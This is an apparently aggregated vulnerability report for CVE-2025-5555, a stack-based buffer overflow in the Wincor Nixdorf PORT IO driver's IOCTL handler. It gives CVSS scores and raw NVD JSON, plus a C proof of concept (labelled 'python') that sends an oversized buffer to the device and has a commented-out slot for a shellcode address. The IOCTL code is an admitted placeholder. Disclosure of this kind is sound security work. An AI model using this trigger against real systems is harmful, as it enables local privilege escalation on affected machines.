Security Vulnerability Report
中文
CVE-2025-5555 CVSS 7.8 HIGH

CVE-2025-5555

Published: 2025-10-18 08:15:34
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability has been found in Nixdorf Wincor PORT IO Driver up to 1.0.0.1. This affects the function sub_11100 in the library wnport.sys of the component IOCTL Handler. Such manipulation leads to stack-based buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. Upgrading to version 3.0.0.1 is able to mitigate this issue. Upgrading the affected component is recommended. The vendor was contacted beforehand and was able to provide a patch very early.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Nixdorf Wincor PORT IO Driver < 1.0.0.1
Nixdorf Wincor PORT IO Driver 1.0.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * CVE-2025-5555 - Wincor Nixdorf PORT IO Driver Stack Buffer Overflow PoC * Vulnerability: Stack-based buffer overflow in sub_11100 (wnport.sys IOCTL Handler) * Target: Wincor Nixdorf PORT IO Driver <= 1.0.0.1 * Author: Security Research Team * * This PoC demonstrates the stack-based buffer overflow vulnerability in the * IOCTL Handler of wnport.sys by sending an oversized buffer via DeviceIoControl. * The vulnerability can be leveraged for local privilege escalation to SYSTEM. */ #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> // IOCTL code for the vulnerable sub_11100 function in wnport.sys // The exact IOCTL code should be reverse-engineered from the driver #define IOCTL_VULNERABLE_CODE 0x222000 // Placeholder - adjust based on reverse engineering // Device name for Wincor Nixdorf PORT IO Driver #define DEVICE_NAME "\\\\.\\WnPort" // Buffer size to trigger overflow (larger than the destination stack buffer) #define OVERFLOW_SIZE 1024 int main(int argc, char *argv[]) { HANDLE hDevice = INVALID_HANDLE_VALUE; DWORD dwBytesReturned = 0; BOOL bResult = FALSE; // Input buffer: oversized data to trigger stack buffer overflow BYTE inBuffer[OVERFLOW_SIZE]; // Output buffer BYTE outBuffer[OVERFLOW_SIZE]; printf("[*] CVE-2025-5555 - Wincor Nixdorf PORT IO Driver Buffer Overflow PoC\n"); printf("[*] Opening device: %s\n", DEVICE_NAME); // Open a handle to the vulnerable driver hDevice = CreateFileA( DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { printf("[!] Failed to open device. Error: %lu\n", GetLastError()); printf("[!] Make sure the Wincor Nixdorf PORT IO Driver is installed.\n"); return 1; } printf("[+] Device opened successfully. Handle: 0x%p\n", hDevice); // Prepare the malicious input buffer // Fill with a recognizable pattern (e.g., 0x41 = 'A') to trigger overflow memset(inBuffer, 0x41, sizeof(inBuffer)); // Optionally place a ROP chain or shellcode address at the offset // where the return address is saved on the stack // size_t retOffset = 0x100; // Adjust based on stack frame layout // *(DWORD64*)(inBuffer + retOffset) = (DWORD64)shellcodeAddress; printf("[*] Sending oversized buffer (%d bytes) to trigger stack overflow...\n", sizeof(inBuffer)); // Trigger the vulnerability by sending the oversized buffer via DeviceIoControl bResult = DeviceIoControl( hDevice, IOCTL_VULNERABLE_CODE, inBuffer, sizeof(inBuffer), outBuffer, sizeof(outBuffer), &dwBytesReturned, NULL ); if (!bResult) { printf("[!] DeviceIoControl failed. Error: %lu\n", GetLastError()); } else { printf("[+] DeviceIoControl returned %lu bytes\n", dwBytesReturned); } // Clean up CloseHandle(hDevice); printf("[*] PoC execution completed.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-5555", "sourceIdentifier": "[email protected]", "published": "2025-10-18T08:15:34.460", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Nixdorf Wincor PORT IO Driver up to 1.0.0.1. This affects the function sub_11100 in the library wnport.sys of the component IOCTL Handler. Such manipulation leads to stack-based buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. Upgrading to version 3.0.0.1 is able to mitigate this issue. Upgrading the affected component is recommended. The vendor was contacted beforehand and was able to provide a patch very early."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 6.8, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://b.iakb.org/2025/06/26/Wincor-Nixdorf-PORT-IO-Driver-Buffer-Overflow/", "source": "[email protected]"}, {"url": "https://download.dieboldnixdorf.com/", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.329013", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329013", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.604823", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.